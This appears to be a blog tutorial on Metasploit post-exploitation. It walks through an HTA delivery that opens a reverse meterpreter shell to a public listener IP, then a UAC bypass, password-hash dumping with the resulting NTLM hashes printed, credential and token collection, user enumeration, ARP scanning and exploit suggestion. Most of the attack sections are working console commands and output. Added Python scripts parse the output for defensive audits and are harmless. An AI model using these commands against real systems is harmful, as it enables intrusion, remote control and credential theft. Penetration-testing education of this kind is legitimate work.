
Metasploit penetration testing: information gathering (1)

Preface


A journey of a thousand miles begins with a single step.
Information gathering is only the beginning.
Information gathering is where we start digging for more valuable information.
Follow 杂术馆 and learn and make progress together with the editor.

Reverse meterpreter


msf > use exploit/windows/misc/hta_server
msf exploit(hta_server) > show options

Module options (exploit/windows/misc/hta_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Powershell x86

msf exploit(hta_server) > set srvhost 104.224.179.110
srvhost => 104.224.179.110
msf exploit(hta_server) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(hta_server) > set lport 8090
lport => 8090
msf exploit(hta_server) > set lhost 104.224.179.110
lhost => 104.224.179.110
msf exploit(hta_server) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 104.224.179.110:8090
[*] Using URL: http://104.224.179.110:8080/Qar5At0gh.hta
[*] Server started.

bypassuac


msf exploit(hta_server) > search bypassuac
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                       Disclosure Date  Rank       Description
   ----                                       ---------------  ----       -----------
   exploit/windows/local/bypassuac            2010-12-31       excellent  Windows Escalate UAC Protection Bypass
   exploit/windows/local/bypassuac_eventvwr   2016-08-15       excellent  Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
   exploit/windows/local/bypassuac_injection  2010-12-31       excellent  Windows Escalate UAC Protection Bypass (In Memory Injection)
   exploit/windows/local/bypassuac_vbs        2015-08-22       excellent  Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)

msf exploit(hta_server) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set session 1
session => 1
msf exploit(bypassuac) > run

[*] Started reverse TCP handler on 104.224.179.110:4444
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (957487 bytes) to 58.63.130.255
[*] Meterpreter session 2 opened (104.224.179.110:4444 -> 58.63.130.255:8166) at 2017-05-12 02:25:16 -0400

meterpreter > background
[*] Backgrounding session 2...
msf exploit(bypassuac) > sessions

Active sessions
===============

  Id  Type                     Information             Connection
  --  ----                     -----------             ----------
  1   meterpreter x86/windows  Yuex-PC\Yuex @ YUEX-PC  104.224.179.110:8090 -> 58.63.130.255:9212 (172.16.68.158)
  2   meterpreter x86/windows  Yuex-PC\Yuex @ YUEX-PC  104.224.179.110:4444 -> 58.63.130.255:8166 (172.16.68.158)

msf exploit(bypassuac) >

Windows hash information gathering

Password dumping method 1


msf exploit(bypassuac) > search hashdump
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                                   Disclosure Date  Rank    Description
   ----                                                   ---------------  ----    -----------
   auxiliary/analyze/jtr_crack_fast                                        normal  John the Ripper Password Cracker (Fast Mode)
   auxiliary/analyze/jtr_mssql_fast                                        normal  John the Ripper MS SQL Password Cracker (Fast Mode)
   auxiliary/analyze/jtr_mysql_fast                                        normal  John the Ripper MySQL Password Cracker (Fast Mode)
   auxiliary/analyze/jtr_oracle_fast                                       normal  John the Ripper Oracle Password Cracker (Fast Mode)
   auxiliary/analyze/jtr_postgres_fast                                     normal  John the Ripper Postgres SQL Password Cracker
   auxiliary/scanner/mssql/mssql_hashdump                                  normal  MSSQL Password Hashdump
   auxiliary/scanner/mysql/mysql_authbypass_hashdump      2012-06-09       normal  MySQL Authentication Bypass Password Dump
   auxiliary/scanner/mysql/mysql_hashdump                                  normal  MYSQL Password Hashdump
   auxiliary/scanner/oracle/oracle_hashdump                                normal  Oracle Password Hashdump
   auxiliary/scanner/postgres/postgres_hashdump                            normal  Postgres Password Hashdump
   post/aix/hashdump                                                       normal  AIX Gather Dump Password Hashes
   post/linux/gather/hashdump                                              normal  Linux Gather Dump Password Hashes for Linux Systems
   post/osx/gather/hashdump                                                normal  OS X Gather Mac OS X Password Hash Collector
   post/solaris/gather/hashdump                                            normal  Solaris Gather Dump Password Hashes for Solaris Systems
   post/windows/gather/credentials/domain_hashdump                         normal  Windows Domain Controller Hashdump
   post/windows/gather/credentials/mcafee_vse_hashdump                     normal  McAfee Virus Scan Enterprise Password Hashes Dump
   post/windows/gather/credentials/mssql_local_hashdump                    normal  Windows Gather Local SQL Server Hash Dump
   post/windows/gather/hashdump                                            normal  Windows Gather Local User Account Password Hashes (Registry)
   post/windows/gather/smart_hashdump                                      normal  Windows Gather Local and Domain Controller Account Password Hashes

msf exploit(bypassuac) > use post/windows/gather/hashdump
msf post(hashdump) > setsession 2
[-] Unknown command: setsession.
msf post(hashdump) > set session 2
session => 2
msf post(hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 79a15b1fd00ada01144f0f590c1e4a25...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

Yuex:"dd"

[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Yuex:1001:aad3b435b51404eeaad3b435b51404ee:cde76edade591827ec01783ffd36d673:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:09e6822ff34047d993ea5f26957fea9a:::

[*] Post module execution completed

In a domain environment, the hashes can instead be dumped with the following method:


msf post(hashdump) > use post/windows/gather/smart_hashdump
msf post(smart_hashdump) > set session 2
session => 2
msf post(smart_hashdump) > run

[*] Running module against YUEX-PC
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20170512022823_default_172.16.68.158_windows.hashes_052429.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 79a15b1fd00ada01144f0f590c1e4a25...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hints...
[+]     Yuex:"dd"
[*]     Dumping password hashes...
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]     HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:09e6822ff34047d993ea5f26957fea9a:::
[*] Post module execution completed
msf post(smart_hashdump) >

arp_scanner


meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24

[*] Running module against V-MAC-XP
[*] ARP Scanning 192.168.1.0/24
[*]     IP: 192.168.1.1 MAC b2:a8:1d:e0:68:89
[*]     IP: 192.168.1.2 MAC 0:f:b5:fc:bd:22
[*]     IP: 192.168.1.11 MAC 0:21:85:fc:96:32
[*]     IP: 192.168.1.13 MAC 78:ca:39:fe:b:4c
[*]     IP: 192.168.1.100 MAC 58:b0:35:6a:4e:cc
[*]     IP: 192.168.1.101 MAC 0:1f:d0:2e:b5:3f
[*]     IP: 192.168.1.102 MAC 58:55:ca:14:1e:61
[*]     IP: 192.168.1.105 MAC 0:1:6c:6f:dd:d1
[*]     IP: 192.168.1.106 MAC c:60:76:57:49:3f
[*]     IP: 192.168.1.195 MAC 0:c:29:c9:38:4c
[*]     IP: 192.168.1.194 MAC 12:33:a0:2:86:9b
[*]     IP: 192.168.1.191 MAC c8:bc:c8:85:9d:b2
[*]     IP: 192.168.1.193 MAC d8:30:62:8c:9:ab
[*]     IP: 192.168.1.201 MAC 8a:e9:17:42:35:b0
[*]     IP: 192.168.1.203 MAC 3e:ff:3c:4c:89:67
[*]     IP: 192.168.1.207 MAC c6:b3:a1:bc:8a:ec
[*]     IP: 192.168.1.199 MAC 1c:c1:de:41:73:94
[*]     IP: 192.168.1.209 MAC 1e:75:bd:82:9b:11
[*]     IP: 192.168.1.220 MAC 76:c4:72:53:c1:ce
[*]     IP: 192.168.1.221 MAC 0:c:29:d7:55:f
[*]     IP: 192.168.1.250 MAC 1a:dc:fa:ab:8b:b
meterpreter >
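The arp_scanner output above prints MAC octets without zero padding, which makes the list awkward to reconcile against an asset inventory. The following Python script is an added example (not code from the original post or from Metasploit): it parses arp_scanner lines, normalizes the MACs, and tags entries a defender would review, namely locally administered addresses (bit 0x02 of the first octet, typical of virtual interfaces and randomized MACs), the VMware OUI 00:0c:29, and any MAC that answers for more than one IP. The OUI table is a constructed minimal one, and the sample lines are copied from the scan above plus one constructed line to exercise the duplicate check.

```python
"""Parse Metasploit arp_scanner output and tag MAC addresses for inventory review.

Added example; not part of the original post or of Metasploit itself.
"""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Matches lines like "[*]     IP: 192.168.1.2 MAC 0:f:b5:fc:bd:22" (octets may lack zero padding).
ARP_LINE_RE = re.compile(
    r"IP:\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+MAC\s+(?P<mac>[0-9a-f]{1,2}(?::[0-9a-f]{1,2}){5})",
    re.IGNORECASE,
)

# Minimal, constructed OUI table; a real inventory tool would load the IEEE registry.
KNOWN_OUIS = {"00:0c:29": "vmware-nic"}


def normalize_mac(mac: str) -> str:
    """Zero-pad every octet and lower-case, e.g. '0:f:b5:fc:bd:22' -> '00:0f:b5:fc:bd:22'."""
    return ":".join(f"{int(octet, 16):02x}" for octet in mac.split(":"))


def classify_mac(mac: str) -> List[str]:
    """Return tags for a normalized MAC that merit a second look during inventory reconciliation."""
    first_octet = int(mac[:2], 16)
    tags = []
    if first_octet & 0x02:
        # Locally administered bit: not a vendor-assigned address (VMs, containers, randomized MACs).
        tags.append("locally-administered")
    if first_octet & 0x01:
        # Group bit set: a multicast address should never answer ARP; treat as a parsing or spoofing anomaly.
        tags.append("multicast-anomaly")
    vendor = KNOWN_OUIS.get(mac[:8])
    if vendor:
        tags.append(vendor)
    return tags


def parse_arp_scan(lines) -> Dict[str, Tuple[str, List[str]]]:
    """Map IP -> (normalized MAC, tags) for every host line in the module output."""
    hosts = {}
    for line in lines:
        m = ARP_LINE_RE.search(line)
        if m:
            mac = normalize_mac(m["mac"])
            hosts[m["ip"]] = (mac, classify_mac(mac))
    return hosts


def duplicate_macs(hosts: Dict[str, Tuple[str, List[str]]]) -> Dict[str, List[str]]:
    """MACs that answered for more than one IP: a classic sign of ARP spoofing, or of a NAT / proxy-ARP device."""
    by_mac = defaultdict(list)
    for ip, (mac, _tags) in hosts.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


# Sample lines copied from the arp_scanner output above, plus one constructed
# line (192.168.1.240) that reuses the .1 host's MAC to exercise the duplicate check.
SAMPLE_OUTPUT = """\
[*] ARP Scanning 192.168.1.0/24
[*]     IP: 192.168.1.1 MAC b2:a8:1d:e0:68:89
[*]     IP: 192.168.1.2 MAC 0:f:b5:fc:bd:22
[*]     IP: 192.168.1.100 MAC 58:b0:35:6a:4e:cc
[*]     IP: 192.168.1.195 MAC 0:c:29:c9:38:4c
[*]     IP: 192.168.1.240 MAC b2:a8:1d:e0:68:89
"""

if __name__ == "__main__":
    hosts = parse_arp_scan(SAMPLE_OUTPUT.splitlines())
    for ip, (mac, tags) in hosts.items():
        print(f"{ip:16} {mac}  {' '.join(tags)}")
    for mac, ips in duplicate_macs(hosts).items():
        print(f"duplicate MAC {mac} seen for {', '.join(ips)}")
```

Run it on the saved module output (or pipe the msfconsole log through it); any host tagged locally-administered or with a duplicate MAC is worth checking against the switch's port table before trusting the scan as an inventory.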

credential_collector: hash and token collection


meterpreter > run post/windows/gather/credentials/credential_collector

[*] Running module against V-MAC-XP
[+] Collecting hashes...
    Extracted: Administrator:7bf4f254f224bb24aad3b435b51404ee:2892d23cdf84d7a70e2eb2b9f05c425e
    Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    Extracted: HelpAssistant:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714
    Extracted: SUPPORT_388945a0:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287
[+] Collecting tokens...
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\NETWORK SERVICE
    NT AUTHORITY\SYSTEM
    NT AUTHORITY\ANONYMOUS LOGON
meterpreter >
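The hashdump and smart_hashdump sections above print accounts in pwdump format (user:rid:lm:nt:::), and credential_collector prints them as "Extracted: user:lm:nt". Two well-known constants make these dumps immediately readable for an auditor: the NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 is the hash of the empty password, and the LM half aad3b435b51404eeaad3b435b51404ee is what is stored when no LM hash exists. The following Python script is an added example (not code from the original post or from Metasploit) that parses both formats and reports the findings a defender would act on: blank-password accounts, accounts that still store a legacy LM hash, and the built-in RIDs 500 and 501. The sample lines are copied from the output above.

```python
"""Audit hash lines dumped by Metasploit's hashdump/smart_hashdump ("user:rid:lm:nt:::")
and credential_collector ("Extracted: user:lm:nt") post modules.

Added example; not part of the original post or of Metasploit itself.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Well-known values: the NT hash (MD4 of the empty UTF-16LE string) of a blank
# password, and the LM half stored when LM hashing is disabled or the password is blank.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"

# Fixed RIDs of the built-in local accounts.
BUILTIN_RIDS = {500: "builtin-administrator", 501: "builtin-guest"}

HEX32 = r"[0-9a-f]{32}"
PWDUMP_RE = re.compile(rf"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>{HEX32}):(?P<nt>{HEX32}):::$", re.I)
EXTRACTED_RE = re.compile(rf"^Extracted:\s*(?P<user>[^:]+):(?P<lm>{HEX32}):(?P<nt>{HEX32})$", re.I)
PREFIX_RE = re.compile(r"^\[[+*!-]\]\s*")  # "[+]" / "[*]" status prefixes printed by the modules


@dataclass
class HashRecord:
    user: str
    rid: Optional[int]   # credential_collector lines carry no RID
    lm: str
    nt: str

    def findings(self) -> List[str]:
        """Audit tags a defender acts on; an empty list means nothing stood out."""
        tags = []
        if self.nt == EMPTY_NT_HASH:
            tags.append("empty-password")    # blank password, or a disabled account that never had one
        if self.lm != EMPTY_LM_HASH:
            tags.append("lm-hash-present")   # legacy LM hash still stored; disable LM hashing on the host
        if self.rid in BUILTIN_RIDS:
            tags.append(BUILTIN_RIDS[self.rid])
        return tags


def parse_hash_line(line: str) -> Optional[HashRecord]:
    """Parse one output line in either format; None for hints, status lines and so on."""
    text = PREFIX_RE.sub("", line.strip())
    m = PWDUMP_RE.match(text)
    if m:
        return HashRecord(m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower())
    m = EXTRACTED_RE.match(text)
    if m:
        return HashRecord(m["user"], None, m["lm"].lower(), m["nt"].lower())
    return None


def audit(lines) -> Dict[str, List[str]]:
    """Map each account name found in the output to its list of findings."""
    report = {}
    for line in lines:
        rec = parse_hash_line(line)
        if rec is not None:
            report[rec.user] = rec.findings()
    return report


# Sample lines copied from the hashdump, smart_hashdump and credential_collector output above.
SAMPLE_OUTPUT = """\
[*] Dumping password hints...
Yuex:"dd"
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Yuex:1001:aad3b435b51404eeaad3b435b51404ee:cde76edade591827ec01783ffd36d673:::
[+]     HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:09e6822ff34047d993ea5f26957fea9a:::
[+] Collecting hashes...
    Extracted: HelpAssistant:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714
    Extracted: SUPPORT_388945a0:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287
"""

if __name__ == "__main__":
    for user, tags in audit(SAMPLE_OUTPUT.splitlines()).items():
        print(f"{user:20} {', '.join(tags) or 'ok'}")
```

The password-hint line (Yuex:"dd") and the status lines are ignored by both patterns, so the script can be pointed at the raw loot file smart_hashdump writes under ~/.msf4/loot without pre-filtering.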

Enumerating logged-on users


meterpreter > run post/windows/gather/enum_logged_on_users

[*] Running against session 1

Current Logged Users
====================

 SID                                            User
 ---                                            ----
 S-1-5-21-628913648-3499400826-3774924290-1000  WIN7-X86\victim
 S-1-5-21-628913648-3499400826-3774924290-1004  WIN7-X86\hacker

[*] Results saved in: /root/.msf4/loot/20170501172925_pwk_192.168.0.6_host.users.activ_736219.txt

Recently Logged Users
=====================

 SID                                            Profile Path
 ---                                            ------------
 S-1-5-18                                       %systemroot%\system32\config\systemprofile
 S-1-5-19                                       C:\Windows\ServiceProfiles\LocalService
 S-1-5-20                                       C:\Windows\ServiceProfiles\NetworkService
 S-1-5-21-628913648-3499400826-3774924290-1000  C:\Users\victim
 S-1-5-21-628913648-3499400826-3774924290-1004  C:\Users\hacker

meterpreter >

Local privilege escalation suggestions: local_exploit_suggester


msf > use post/multi/recon/local_exploit_suggester
msf post(local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION          2                yes       The session to run this module on.
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf post(local_exploit_suggester) > run

[*] 192.168.101.129 - Collecting local exploits for x86/windows...
[*] 192.168.101.129 - 31 exploit checks are being tried...
[+] 192.168.101.129 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 192.168.101.129 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.101.129 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.101.129 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 192.168.101.129 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[*] Post module execution completed
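For a defender, the value of the local_exploit_suggester output above is the list of Microsoft bulletins it implies are missing on the host. Metasploit names its Windows local modules after the bulletin (msYY_NNN_name), so the module path can be turned directly into a patch work list, with the two verdict strings the module prints ("appears to be vulnerable" versus "running, but could not be validated") separating confirmed gaps from ones that need manual verification. The following Python script is an added example (not code from the original post or from Metasploit) that does this over the lines shown above.

```python
"""Turn local_exploit_suggester output into a patch work list grouped by confidence.

Added example; not part of the original post or of Metasploit itself.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional

# "[+] 192.168.101.129 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable."
RESULT_RE = re.compile(
    r"^\[\+\]\s+(?P<host>\S+)\s+-\s+(?P<module>exploit/\S+?):\s+(?P<verdict>.+?)\.?\s*$"
)
# Windows local modules are named after the bulletin they implement: msYY_NNN_<name>.
BULLETIN_RE = re.compile(r"/ms(?P<yy>\d{2})_(?P<num>\d{3})_", re.IGNORECASE)

# Verdict strings printed by the module, mapped to how much weight to give them.
CONFIDENCE = {
    "The target appears to be vulnerable": "likely",
    "The target service is running, but could not be validated": "unverified",
}


def bulletin_from_module(module: str) -> Optional[str]:
    """'exploit/windows/local/ms15_051_client_copy_image' -> 'MS15-051'; None if not bulletin-named."""
    m = BULLETIN_RE.search(module)
    return f"MS{m['yy']}-{m['num']}" if m else None


def parse_suggester(lines) -> Dict[str, List[Dict[str, Optional[str]]]]:
    """Group findings by confidence; each finding records host, module path and bulletin."""
    grouped = defaultdict(list)
    for line in lines:
        m = RESULT_RE.match(line.strip())
        if not m:
            continue  # "[*]" progress lines carry no finding
        confidence = CONFIDENCE.get(m["verdict"], "other")
        grouped[confidence].append(
            {"host": m["host"], "module": m["module"], "bulletin": bulletin_from_module(m["module"])}
        )
    return dict(grouped)


def missing_bulletins(lines) -> List[str]:
    """Sorted, de-duplicated bulletins behind 'likely' findings: the patches to confirm and apply first."""
    likely = parse_suggester(lines).get("likely", [])
    return sorted({f["bulletin"] for f in likely if f["bulletin"]})


# Sample lines copied from the local_exploit_suggester output above.
SAMPLE_OUTPUT = """\
[*] 192.168.101.129 - Collecting local exploits for x86/windows...
[*] 192.168.101.129 - 31 exploit checks are being tried...
[+] 192.168.101.129 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 192.168.101.129 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.101.129 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.101.129 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 192.168.101.129 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[*] Post module execution completed
"""

if __name__ == "__main__":
    for confidence, findings in parse_suggester(SAMPLE_OUTPUT.splitlines()).items():
        print(confidence)
        for f in findings:
            print(f"  {f['host']}  {f['bulletin'] or '-':9} {f['module']}")
    print("patch first:", ", ".join(missing_bulletins(SAMPLE_OUTPUT.splitlines())))
```

The "unverified" group is not noise: the module only confirmed that the affected service is running, so those bulletins should be checked against the host's installed updates rather than dismissed.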

Closing

This is only the beginning. Follow 杂术馆 and let us explore this wonderful world together.

Reproduction without permission is prohibited: 杂术馆 » Metasploit penetration testing: information gathering (1)